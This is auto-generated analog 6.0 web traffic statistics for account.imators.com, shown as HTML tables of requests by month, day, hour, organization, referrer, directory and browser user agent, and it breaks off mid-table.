href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">84</td><td class="b">54.30%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">103</td><td class="b">45.06%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">14</td><td class="b"> 0.64%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">103</td><td class="b">45.06%</td><td class="D">Jan/29/25 5:15 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">22</td><td class="b">10.69%</td><td class="D">Jan/29/25 5:15 AM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr><td class="R">25</td><td class="b">32.80%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">25</td><td class="b"> 5.10%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">48</td><td class="b">17.04%</td><td class="D">Jan/24/25 4:04 PM</td><td class="xl">[not listed: 8 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[�5�� �� 4.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Tue, Apr 29 2025 at 2:21 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Tue, Apr 29 2025 at 8:22 AM (176.69 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Apr 29 2025 at 2:21 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 289 (2) <br /><span class="gensumtitle">Average successful requests per day:</span> 1 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 166 (2) <br /><span class="gensumtitle">Failed requests:</span> 260 (1) <br /><span class="gensumtitle">Distinct files requested:</span> 24 (99) <br /><span class="gensumtitle">Distinct hosts served:</span> 156 (192) <br /><span class="gensumtitle">Data transferred:</span> 237.62 kilobytes (1.20 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 1.34 kilobytes (176 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">60</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Nov 2024 (60 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">85</td><td class="P">40</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">39</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">13</td><td class="P">11</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">40</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">25</td><td class="P">21</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">63</td><td class="P">39</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">24</td><td class="P">17</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 1 request for a page.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">18</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 1</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">6</td><td class="P">6</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">10</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 4</td><td class="R">12</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x"> 5</td><td class="R">5</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 6</td><td class="R">5</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x"> 8</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x"> 9</td><td class="R">26</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">7</td><td class="P">7</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">1</td><td class="P">1</td><td class="bar"><img src="/images/barb1.png" alt="+" /></td></tr> <tr><td class="x">12</td><td class="R">5</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">13</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">14</td><td class="R">13</td><td class="P">13</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">39</td><td class="P">16</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">16</td><td class="R">45</td><td class="P">23</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">40</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">18</td><td class="R">9</td><td class="P">5</td><td class="bar"><img src="/images/barb4.png" alt="+++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">10</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">20</td><td class="R">10</td><td class="P">8</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">21</td><td class="R">4</td><td class="P">4</td><td class="bar"><img src="/images/barb4.png" alt="++++" /></td></tr> <tr><td class="x">22</td><td class="R">10</td><td class="P">10</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">3</td><td class="P">3</td><td class="bar"><img src="/images/barb2.png" alt="+++" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">289</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">66</td><td class="b">27.06%</td><td class="xl">205.169</td></tr> <tr><td class="R">23</td><td class="b"> 9.66%</td><td class="xl">44</td></tr> <tr><td class="R">20</td><td class="b"> 8.92%</td><td class="xl">34</td></tr> <tr><td class="R">19</td><td class="b"> 7.02%</td><td class="xl">54</td></tr> <tr><td class="R">13</td><td class="b"> 4.64%</td><td class="xl">35</td></tr> <tr><td class="R">13</td><td class="b"> 3.29%</td><td class="xl">167.94</td></tr> <tr><td class="R">12</td><td class="b"> 6.23%</td><td class="xl">205.210</td></tr> <tr><td class="R">10</td><td class="b"> 3.05%</td><td class="xl">3</td></tr> <tr><td class="R">7</td><td class="b"> 1.77%</td><td class="xl">206.168</td></tr> <tr><td class="R">6</td><td class="b"> 2.59%</td><td class="xl">138.68</td></tr> <tr><td class="R">6</td><td class="b"> 0.16%</td><td class="xl">194.87</td></tr> <tr><td class="R">6</td><td class="b"> 2.05%</td><td class="xl">64.227</td></tr> <tr><td class="R">5</td><td class="b"> 1.27%</td><td class="xl">87</td></tr> <tr><td class="R">4</td><td class="b"> 0.82%</td><td class="xl">104</td></tr> <tr><td class="R">4</td><td class="b"> 2.08%</td><td class="xl">192.175</td></tr> <tr><td class="R">4</td><td class="b"> 2.08%</td><td class="xl">198.235</td></tr> <tr><td class="R">4</td><td class="b"> 1.01%</td><td class="xl">138.197</td></tr> <tr><td class="R">3</td><td class="b"> 0.76%</td><td class="xl">137.184</td></tr> <tr><td class="R">3</td><td class="b"> 0.76%</td><td class="xl">157.245</td></tr> <tr><td class="R">3</td><td class="b"> 0.11%</td><td class="xl">16</td></tr> <tr><td class="R">58</td><td class="b">14.66%</td><td class="xl">[not listed: 35 organizations]</td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">27</td><td class="xl"><a href="http://www.account.imators.com/">http://www.account.imators.com/</a></td></tr> <tr><td class="R">12</td><td class="xl"><a href="http://account.imators.com/">http://account.imators.com/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">58</td><td class="xl">http://www.account.imators.com/</td></tr> <tr><td class="R">30</td><td class="xl">http://account.imators.com/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">30</td><td class="P">30</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">7</td><td class="P">7</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">30</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582</td></tr> <tr><td class="R">20</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">11</td><td class="P">3</td><td class="xl">Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">10</td><td class="P">2</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36</td></tr> <tr><td class="R">2</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">6</td><td class="P">2</td><td class="xl">Mozilla/5.0 (Linux; Android 8.0.0; SM-G965U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">5</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/2865beb warc/v0.8.73</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">python-requests/2.31.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36</td></tr> <tr><td class="R">1</td><td class="P">1</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.2; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">4</td><td class="P">1</td><td class="xl">Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36</td></tr> <tr><td class="R">1</td><td 